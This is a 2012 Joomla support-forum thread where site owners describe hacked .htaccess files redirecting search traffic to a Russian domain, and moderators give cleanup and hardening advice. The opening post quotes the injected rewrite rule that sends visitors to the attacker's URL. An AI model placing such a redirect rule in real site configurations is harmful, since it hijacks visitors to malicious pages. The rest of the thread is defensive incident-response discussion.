htaccess hacked, re-directing traffic to xx.ru

Discussion regarding Joomla! 2.5 security issues.

renegadeskone
Joomla! Fledgling
Posts: 4
Joined: Thu Feb 16, 2012 10:45 am

htaccess hacked, re-directing traffic to xx.ru

Post by renegadeskone » Sat Mar 31, 2012 2:17 am

Hey, I had been delaying a Joomla site update to 2.5.3 and this managed to hack my .htaccess a few hours before I had scheduled to perform the upgrade. Originally I was running 1.7 and .htaccess was hacked, which included HTTP REFERER code (can post if needed) and a rewrite rule of

RewriteRule ^(.*)$ http://xx.ru/in.cgi?4 [R=301,L]

I updated to Joomla 2.5.3 using the patch, and then woke up this morning to see the htaccess had been hacked again. Since then I've updated my FTP password details and am scanning my computer now.

Next thing will be to go through the vulnerable extensions list and extract the 2.5.3 full package to the account.

If anyone could help out with what I could do to clean this out that would be great.

Here's the FPA output: (I replaced the username with XXX)
Problem Description :: Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:htaccess hacked http://xx.ru/in.cgi?4
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:[31-Mar-2012 12:05:09 UTC] PHP Warning: date() [<a href=\'function.date\'>function.date</a>]: It is not safe to rely on the system\'s timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected \'Antarctica/Macquarie\' for \'EST/10.0/no DST\' instead in /home/XXX/public_html/fpa-en.php on line 486
Actions Taken To Resolve by Forum Post Assistant (v1.2.0) 31st March 2012 wrote:Updated to latest Joomla. Re-created htaccess file and set permissions to 444
Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.3-Stable (Ember) 15-March-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Writable (644) | Owner: XXX (uid: 512/gid: 509) | Group: XXX (gid: 509) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-274.17.1.el5xen | Technology: x86_64 | Web Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_fcgid/2.3.6 | Encoding: gzip,deflate,sdch | Doc Root: /home/XXX/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.10 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: error_log | Last Known Error: 31st March 2012 23:06:58. | Register Globals: 1 | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 4M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 36.24 MiB | #of _FPA_TABLE: 284
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.10) | date (5.3.10) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | standard (5.3.10) | Phar (2.0.1) | posix () | Reflection ($Revision: 321634 $) | imap () | SimpleXML (0.1) | sockets () | exif (1.4 $Id: exif.c 321634 2012-01-01 13:15:04Z felipe $) | tidy (2.0) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.9.1) | cgi-fcgi () | ionCube Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Database Information :: wrote:Database _FPA_STATS :: Uptime: 1272935 | Threads: 2 | Questions: 26424962 | Slow queries: 36 | Opens: 3778739 | Flush tables: 1 | Open tables: 64 | Queries per second avg: 20.759 |
Extensions Discovered :: wrote:Components :: SITE :: com_wrapper (2.5.0) | Bubble (2.6.0) | Blackout (2.6.0) | Default (2.6.0) | Blueface (2.6.0) | WF_AGGREGATOR_VIMEO_TITLE (2.0.20) | WF_AGGREGATOR_[youtube]_TITLE (2.0.20) | WF_LINKS_JOOMLALINKS_TITLE (2.0.20) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.20) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.20) | WF_POPUPS_WINDOW_TITLE (2.0.20) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.20) | WF_MEDIA_TITLE (2.0.20) | WF_PREVIEW_TITLE (2.0.20) | WF_TABLE_TITLE (2.0.20) | WF_CLEANUP_TITLE (2.0.20) | WF_NONBREAKING_TITLE (2.0.20) | WF_SPELLCHECKER_TITLE (2.0.20) | WF_LAYER_TITLE (2.0.20) | WF_INLINEPOPUPS_TITLE (2.0.20) | WF_LINK_TITLE (2.0.20) | WF_SOURCE_TITLE (2.0.20) | WF_PASTE_TITLE (2.0.20) | WF_CONTEXTMENU_TITLE (2.0.20) | WF_TEXTCASE_TITLE (2.0.20) | WF_DIRECTIONALITY_TITLE (2.0.20) | WF_AUTOSAVE_TITLE (2.0.20) | WF_SEARCHREPLACE_TITLE (2.0.20) | WF_BROWSER_TITLE (2.0.20) | WF_FULLSCREEN_TITLE (2.0.20) | WF_XHTMLXTRAS_TITLE (2.0.20) | WF_IMGMANAGER_TITLE (2.0.20) | WF_STYLE_TITLE (2.0.20) | WF_VISUALCHARS_TITLE (2.0.20) | WF_ARTICLE_TITLE (2.0.20) | WF_PRINT_TITLE (2.0.20) | com_mailto (2.5.0) |
Components :: ADMIN :: com_jaextmanager (1.1.2) | Admintools (2.2.0) | com_admin (2.5.0) | COM_ADVANCEDMODULES (2.2.16) | Akeeba (3.4.3) | com_media (2.5.0) | Magic Zoom Plus (v4.4.8 [v1.0.) | Magic Zoom Plus module for Joo (v4.4.8 [v1.0.) | K2 (2.5.1) | com_installer (2.5.0) | com_modules (2.5.0) | com_plugins (2.5.0) | com_cpanel (2.5.0) | VirtueMart_allinone (-) | com_finder (2.5.0) | eXtplorer (2.1.0RC5) | JReviews (2.3.18.212) | com_jreviews (2.3.18.212) | JomSocial (2.6.0) | com_templates (2.5.0) | VIRTUEMART (-) | ECB Currency Converter (1.0) | com_categories (2.5.0) | com_users (2.5.0) | ChronoForms (4.0 RC3.11) | Editor - JCE (2.0.20) | JCE (2.0.20) | Unknown (-) | com_config (2.5.0) | com_checkin (2.5.0) | com_login (2.5.0) | com_menus (2.5.0) | Joomailer Mailchimp Signup (1.9) | com_languages (2.5.0) | JoomailerMailchimpIntegration (1.7.2) | COM_NONUMBERMANAGER (2.6.10) | Unknown (-) | com_redirect (2.5.0) | com_weblinks (2.5.0) | com_messages (2.5.0) | com_content (2.5.0) | Modules (1.5.0) | Components (1.5.0) | K2 (1.5.8) | JomSocial (1.5.8) | Menus (1.5.0) | Web Links (1.5.1) | News Feeds (1.5.1) | Content (1.5.3) | Plugins (1.5.0) | Users (1.5.0) | Banners (1.5.1) | com_acesearch (2.5.0) | AdAgency (3.0.15) | com_search (2.5.0) | com_cache (2.5.0) | com_s2framework (1.4.14.72) | S2Framework (1.4.14.72) | com_banners (2.5.0) | com_newsfeeds (2.5.0) |

Modules :: SITE :: AceSearch (1.5.0) | JReviews Directories Module (2.3) | Dating Search (2.6.0) | MailChimp Signup (1.7) | GeoMaps Module (2.3) | mod_syndicate (2.5.0) | Active Groups (2.6.0) | JReviews Favorite Users Module (2.3) | JReviews Listings Module (2.3) | mod_articles_archive (2.5.0) | mod_search (2.5.0) | Jomsocial Notification (2.6.0) | Latest group walls (2.2.4) | K2 User (2.5.1) | Top Members (2.6.0) | Simple Featured VM Products (0.1) | Ad Agency Menu (3.0.0) | mod_articles_news (2.5.0) | mod_custom (2.5.0) | Latest Discussion (2.6.0) | mod_languages (2.5.0) | Ad Agency Zone (3.0.3) | mod_wrapper (2.5.0) | mod_banners (2.5.0) | mod_virtuemart_search (2.0.0RC3) | Online Users (2.6.0) | Video Comments (2.6.0) | K2 Comments (2.5.1) | mod_virtuemart_manufacturer (2.0.0RC3) | mod_articles_category (2.5.0) | JReviews Reviews Module (2.3) | JReviews Fields Module (2.3) | mod_stats (2.5.0) | K2 Users (2.5.1) | mod_articles_categories (2.5.0) | mod_login (2.5.0) | VirtueMart Shopping Cart (2.0.0RC3) | JomSocial Statistics (2.6.0) | Latest Members (2.6.0) | JomSocial Connect (2.6.0) | K2 Content (2.5.1) | mod_articles_latest (2.5.0) | jReviews Advanced Search Modul (2.3) | mod_related_items (2.5.0) | Latest group posts (2.6.0) | mod_virtuemart_product (2.0.0RC3) | Dropdown MegaMenu (1.0.1) | Photo Comments (2.6.0) | mod_menu (2.5.0) | mod_whosonline (2.5.0) | Upcoming Events (2.6.0) | mod_footer (2.5.0) | JReviews Range Module (2.3) | mod_breadcrumbs (2.5.0) | mod_finder (2.5.0) | Hello Me (2.6.0) | Activity Stream (2.6.0) | mod_articles_popular (2.5.0) | mod_users_latest (2.5.0) | mod_virtuemart_category (2.0.0RC3) | mod_virtuemart_currencies (2.0.0RC3) | JReviews Totals Module (2.3) | mod_feed (2.5.0) | Magic Zoom Plus module for Joo (v4.4.8 [v1.0.) | mod_random_image (2.5.0) | K2 Tools (2.5.1) | K2 Login (2.5.1) | User Anywhere (0.1) | mod_weblinks (2.5.0) |
Modules :: ADMIN :: K2 QuickIcons (admin) (2.5.1) | mod_status (2.5.0) | mod_popular (2.5.0) | mod_version (2.5.0) | mod_multilangstatus (1.7.1) | mod_latest (2.5.0) | mod_custom (2.5.0) | mod_toolbar (2.5.0) | AceSearch - Quick Icons (1.5.0) | RSFinder (1.0.0) | MailChimp Stats (1.1) | K2 Stats (admin) (2.5.1) | mod_login (2.5.0) | Akeeba Backup Notification Mod (3.4.3) | Admin Tools Joomla! Upgrade No (2.2.0) | mod_menu (2.5.0) | mod_title (2.5.0) | mod_quickicon (2.5.0) | mod_logged (2.5.0) | mod_feed (2.5.0) | mod_submenu (2.5.0) | AceSearch (1.5.0) |

Plugins :: SITE :: Editor - JCE (2.0.20) | plg_editors_tinymce (3.4.7) | plg_editors_codemirror (1.0) | plg_extension_joomla (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_content (2.5.0) | System - Joomla! Update Email (1.0) | plg_system_debug (2.5.0) | plg_system_redirect (2.5.0) | System - System Restore Points (3.4.3) | System - Jomsocial Facebook Co (2.6.0) | plg_system_remember (2.5.0) | iJoomlaUpgradeAlert (1.0) | iJoomla News (1.0.1) | plg_system_log (2.5.0) | plg_system_p3p (2.5.0) | Akeeba Backup Lazy Scheduling (3.3) | plg_system_logout (2.5.0) | JA T3 Framework (1.5.0) | PLG_SYSTEM_SOURCERER (2.11.3) | System - Akeeba Backup Update (1.0) | plg_system_languagecode (2.5.0) | PLG_SYSTEM_ADVANCEDMODULES (2.2.16) | System - K2 (2.5.1) | Button - JA Typography (1.1.2) | System - Admin Tools (2.2.0) | System - JB Library (1.2.1) | System - Zend Lib (1.11.4) | plg_system_highlight (2.5.0) | PLG_SYSTEM_MODULESANYWHERE (1.13.3) | System - Megamenu Framework (1.0.0) | plg_system_sef (2.5.0) | Azrul System Mambot For Joomla (2.6.0) | System - RSFinder (1.2.0) | Jomsocial Update (2.6.0) | System - Force Password Change (2.0) | System - joomlamailer MailChim (1.9) | plg_system_languagefilter (2.5.0) | System - One Click Action (1.0) | PLG_SYSTEM_NNFRAMEWORK (12.1.6) | plg_system_cache (2.5.0) | jomsocialredirect (2.6.0) | System - freakedout Mailchimp (1.0) | System - Admin Tools Update Em (1.0) | plg_captcha_recaptcha (2.5.0) | VMPAYMENT_PAYPAL (2.0.1) | VMPAYMENT_STANDARD (2.0.1) | VM - Payment, PayZen (1.2) | VM Payment - authorize.net AIM (2.0.1) | VMCustom - textinput (1.9.8) | VMCustom - specification (2.0.0RC3) | VMCUSTOM_STOCKABLE (1.9.8) | plg_search_contacts (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_categories (2.5.0) | plg_search_weblinks (2.5.0) | Search - K2 (2.5.1) | plg_search_content (2.5.0) | plg_search_virtuemart (1.5) | Input Processor (2.6.0) 
| Eventlist (2.2.4) | Unknown (-) | My Contacts (2.6.0) | Walls (2.6.0) | Unknown (-) | My twitter updates (2.6.0) | Unknown (-) | Events (2.6.0) | Events (2.6.0) | JomComment (2.2.4) | My Listings (2.3) | System (2.2.4) | Wordfilter (2.6.0) | MyBlog (2.6.0) | joomlamailer (1.0) | Unknown (-) | Feeds (2.6.0) | Allvideo (2.2.4) | Invite (2.6.0) | My Google Ads (2.6.0) | Unknown (-) | Log (2.6.0) | Editor - My Photos (2.2.4) | My Articles (2.6.0) | Friend's Location (2.6.0) | My Reviews (2.3) | My Tagged Videos (2.6.0) | Unknown (-) | Latest Photos (2.6.0) | Input Link (2.2.4) | Nice Talk (2.2.4) | Unknown (-) | My Latest Videos (2.6.0) | Unknown (-) | MyBlog Toolbar (2.6.0) | My Favorites (2.3) | plg_content_finder (2.5.0) | AllVideos (by JoomlaWorks) (4.4) | plg_content_geshi (2.5.0) | plg_content_joomla (2.5.0) | JReviews (2.3.16) | plg_content_emailcloak (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_pagebreak (2.5.0) | chronoforms (V4 RC2.0) | plg_content_vote (2.5.0) | plg_content_pagenavigation (2.5.0) | VMSHIPMENT_WEIGHT_COUNTRIES (2.0.1) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | User - K2 (2.5.1) | User - Jomsocial User (2.6.0) | plg_user_joomla (2.5.0) | plg_editors-xtd_readmore (2.5.0) | Button - Sourcerer (2.11.3) | plg_editors-xtd_image (2.5.0) | PLG_EDITORS-XTD_MODULESANYWHER (1.13.3) | plg_editors-xtd_article (2.5.0) | Editor Button - My Photos (2.6.0) | plg_editors-xtd_pagebreak (2.5.0) | Authentication - Master User (1.1.1) | plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_quickicon_extensionupdate (2.5.0) |
Templates Discovered :: wrote:Templates :: SITE :: beez_20 (2.5.0) | ciyl (0.1) | digiflip-default-17 (1.0) | atomic (2.5.0) | ja_t3_blank (1.0.7) | beez5 (2.5.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Sat Mar 31, 2012 8:39 am, edited 2 times in total.
Reason: removed url as per rules

vicyankees
Joomla! Apprentice
Posts: 5
Joined: Fri May 09, 2008 2:54 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by vicyankees » Sat Mar 31, 2012 3:50 am

I am actually experiencing the same thing on 1.5.22... I have restored to an old version and it still pops up relatively quickly -- it seems like it's been lingering for a while and today was a trigger day of some sort.

PascM
Joomla! Apprentice
Posts: 39
Joined: Thu Apr 02, 2009 12:51 pm
Location: Athens - Greece

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PascM » Sat Mar 31, 2012 5:32 am

Check your installation for other suspicious files.
Joomla Drupal WordPress Hosting http://www.pascm.net

manishjaiswal
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 7:18 am

I am experiencing the same thing.. please help me out as my search result in Google is getting redirected to http://xx.ru/in.cgi?4.

what is the issue and how to rectify it ???
Is there a Virus on my server ???

Please help my site address is http://www.getfreedealz.com
If I type the site into a web browser I can view the site, but on Google organic search it is getting redirected... I have no clue how to sort out this issue..??? :-(

PascM
Joomla! Apprentice
Posts: 39
Joined: Thu Apr 02, 2009 12:51 pm
Location: Athens - Greece

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PascM » Sat Mar 31, 2012 7:23 am

Clear your browser's cache; your site doesn't redirect. BUT still you should check for other strange / unknown files / change all your passwords.
Joomla Drupal WordPress Hosting http://www.pascm.net

manishjaiswal
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 8:13 am

Yes it does.. you may have clicked on the link I posted on the forum.
If you type my website on google search then it will be redirected to http://xx.ru/in.cgi?4

All my search results are getting redirected.. please help

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Sat Mar 31, 2012 8:46 am

1. please do not post the full link to the malicious site or a full link to a site that is affected by malicious code

from http://docs.joomla.org/Security_Checklist_7
A Safe route for disaster relief

save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
wipe the entire folder where Joomla! is installed
upload a new clean full package latest version of joomla 1.5.x or Joomla 1.7.x/2.5.x (minus the install folder)
reupload your configuration file & images.
reupload or reinstall the latest versions of your extensions , templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site)

Go through http://forum.joomla.org/viewtopic.php?f=621&t=582854 also what hosts are you on.
to manishjaiswal: if you had read, you will see the issue is in the htaccess file for your site
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

manishjaiswal
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 8:47 am

Is there any solution after what has happened to all my google search results.. if anyone has solution please provide

jmuehleisen
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda

Re: htaccess hacked, re-directing traffic to xx.ru

Post by jmuehleisen » Sat Mar 31, 2012 10:48 am

If Google is marking your site as a source of mal-ware, then try this.

Go to the Google Webmasters Tools site: https://www.google.com/webmasters/tools/home?hl=en

Sign up for a free account (if you don't have one) and register your site.

They will give you a file to upload to the root of your website to prove that you are the owner of the site.

Once that is confirmed (one click, really), then request a reconsideration of your site.

They will rescan your site and remove the warnings if they find your site "clean."
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

slewis1972
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

xxx.ru - joomla seems to want to load it?????

Post by slewis1972 » Sat Mar 31, 2012 4:58 pm

Hi

If I go to http://ww w.hamptonfc. net via Chrome, on some occasions it says connecting to xxx.ru bottom left.

Any ideas if this is a major issue, just cannot locate if the template has been hacked or a plugin/module causing it?

Thanks
Last edited by mandville on Sun Apr 01, 2012 8:16 am, edited 2 times in total.
Reason: Moved topic » from General Questions/New to Joomla! 2.5 / Joomla! 1.7 to Security in Joomla! 2.5 / Joomla! 1.7- removed and broke links

jmuehleisen
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda

Re: pas-tro.ru - joomla seems to want to load it?????

Post by jmuehleisen » Sat Mar 31, 2012 5:53 pm

The site has probably been hacked.

Take a look at the .htaccess file ... and see if an .htaccess file has been placed in other folders than the root.

There is a current rash of hacks using this method (among other methods).
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

beyondthenet
Joomla! Fledgling
Posts: 3
Joined: Sat Mar 31, 2012 7:21 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by beyondthenet » Sat Mar 31, 2012 7:28 pm

We had a site hacked with the root and public_html folders hacked, plus I found about 12 new .htaccess files in various primary Joomla folders. Below is a sample of one of these new .htaccess files.

I updated the site to 1.5.26 hoping that this recent security update would fix the security hole. Do you think the 1.5.26 security update will prevent this hack from happening again? Or will the hackers inevitably get into the site again?

Thank you

=======
[mod edit - imanickam: Removed the code]
Last edited by imanickam on Sun Apr 01, 2012 4:00 am, edited 1 time in total.
Reason: Being a public forum, for security reasons, removed the code that may be used for hacking.

raku21
Joomla! Fledgling
Posts: 1
Joined: Sat Mar 31, 2012 7:31 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by raku21 » Sat Mar 31, 2012 7:46 pm

I have the same problem but I didn't find more .htaccess files .....

I found the file and resolved the problem ....
Last edited by raku21 on Sat Mar 31, 2012 7:54 pm, edited 1 time in total.

slewis1972
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by slewis1972 » Sat Mar 31, 2012 7:54 pm

I cannot find them all. I have loads, but only some seem to be infected. I have one in:
/
then folder of joomla

Anywhere else?

beyondthenet
Joomla! Fledgling
Posts: 3
Joined: Sat Mar 31, 2012 7:21 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by beyondthenet » Sat Mar 31, 2012 8:14 pm

look in
/plugins
/administrator
/images
and every other primary Joomla folder

jmuehleisen
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda

Re: pas-tro.ru - joomla seems to want to load it?????

Post by jmuehleisen » Sun Apr 01, 2012 1:42 am

Let me suggest you take a look at the Security forum here:

http://forum.joomla.org/viewforum.php?f=621

There are lots of tips on how to clean up a hacked site (none of them are quick, as hackers often hide "back doors" to your site so they can re-hack it after an incomplete cleanup).

In particular, look at this post:

http://forum.joomla.org/viewtopic.php?f=621&t=582854
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

slewis1972
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by slewis1972 » Sun Apr 01, 2012 6:39 am

A quick way. I got my site to enable ssh, and via

grep -lir " http://[url-removed]" *

I located all the infected files.
Last edited by imanickam on Sun Apr 01, 2012 8:15 am, edited 1 time in total.
Reason: Removed the URL posted as it could be harmful

leolam
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: pas-tro.ru - joomla seems to want to load it?????

Post by leolam » Sun Apr 01, 2012 8:01 am

I sincerely doubt that you have found all the infected files, for there are other scripts that can be located generating these links. That is no solution but a temporary fix (?)

You need to get to the bottom of how they got into your system or your server, which is more important, so you need to follow http://forum.joomla.org/viewtopic.php?f=621&t=582854 all steps without exclusions!

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 8:23 am

please do not post the full link to the malicious site or a full link to a site that is affected by malicious code

from http://docs.joomla.org/Security_Checklist_7
A Safe route for disaster relief

save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
wipe the entire folder where Joomla! is installed
upload a new clean full package latest version of joomla 1.5.x or Joomla 1.7.x/2.5.x (minus the install folder)
reupload your configuration file & images.
reupload or reinstall the latest versions of your extensions , templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site)

This defacement has affected many hosts and many scripts, WP, VB etc.
a common place for defacement files is your tmp folder
there are numerous topics on this, please read those before starting your own

the suggestions are all the same. see the help links already suggested in this topic
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

big vern
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by big vern » Sun Apr 01, 2012 1:34 pm

Thanks for the info - It seems there are many affected by this exploit - do we know what it is and is it patched on the latest Joomla version? (I am guessing a lot of people haven't yet noticed the issue as they bookmark the address rather than go via a search engine)
Can I do a full home folder restore to a known 'clean' version of my website and then upgrade Joomla to the latest version?

Webdongle
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by Webdongle » Sun Apr 01, 2012 1:48 pm

big vern wrote:... - It seems there are many affected by this exploit - do we know what it is and is it patched on the latest joomla version? ...
If you notice ... the sites affected are sites that do not have the latest update of Joomla or latest of the extensions or have an extension that is listed on the VEL. It is not something that needs to be patched in Joomla. It is the awareness of the webmasters that needs to be patched.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 1:52 pm

big vern wrote:do we know what it is and is it patched on the latest joomla version?
this is not a joomla specific issue and has been seen across a multitude of platforms and hosts.
can I do a full home folder restore to a known 'clean' version of my website and then upgrade joomla to the latest version?
yes, that is the recommended method
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

big vern
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by big vern » Sun Apr 01, 2012 2:07 pm

Thanks very much for the quick replies - I am on shared hosting - I will have to do all the upgrades (inc. extensions etc.) and see what happens.
I realised the need to be on the latest versions - once I am fully up to date, will this solve this exploit or do I need to tell my hosting provider to start looking at their servers?

""If you notice ... the sites affected are sites that do not have the latest update of Joomla or latest of the extensions or have an extension that is listed on the VEL. It is not something that needs to be patched in Joomla. It is the awareness of the webmasters that needs to be patched""

Probably my lack of knowledge but that doesn't make sense to me -
'If you notice ... the sites affected are sites that do not have the latest update of Joomla...'
then;
'it's not something that needs to be patched in joomla'.
If newer versions are not affected then they have been patched against this issue?

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 2:45 pm

my post between webdongle's and yours can be read as webdongle's post translated. there is also the addition of "webmasters need to be patched", which translates to this topic in the docs
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Webdongle
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by Webdongle » Sun Apr 01, 2012 3:16 pm

big vern wrote:... once am I fully upto date - will this solve this exploit ...
Have you deleted all the folders files before updating ?
big vern wrote:...
'it's not something that needs to be patched in joomla'.
If newer versions are not affected then they have been patched against this issue?
They have been patched against issues that affect them. There are many exploits that affect servers and all types of sites.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Sun Apr 01, 2012 4:41 pm

The security moderators have taken the decision to merge all the related hack topics into one place. This is not normal practice.
The htaccess redirect hack is not joomla specific, it has affected all sorts of platforms (wordpress, drupal, vbulletin) on various hosts.
At the present time we are lost as to what could be causing this.
Our clear recommendation is to follow the following checklist http://forum.joomla.org/viewtopic.php?f=432&t=475313 and security checklist 7.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

leolam
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Sun Apr 01, 2012 5:59 pm

I did some research on the web related to these htaccess-hacks (leaving server security beyond scope of discussion) and at present we do not protect our own htaccess as distributed with the core. My understanding from my exploration is that with either

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
or

<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
you are ok since it prevents external access to any file with .hta

Maybe somebody can confirm my findings and if so then it should be added to the next release.

I found this on a Wordpress blog as well as on multiple other sites. I do realize that finding out how and why is important but if we want to assist this needs urgent clarification to get a confirmation so we can add this in next release already. I will post this also to the bug squad

Leo 8)
Joomla's #1 Professional Services Provider:
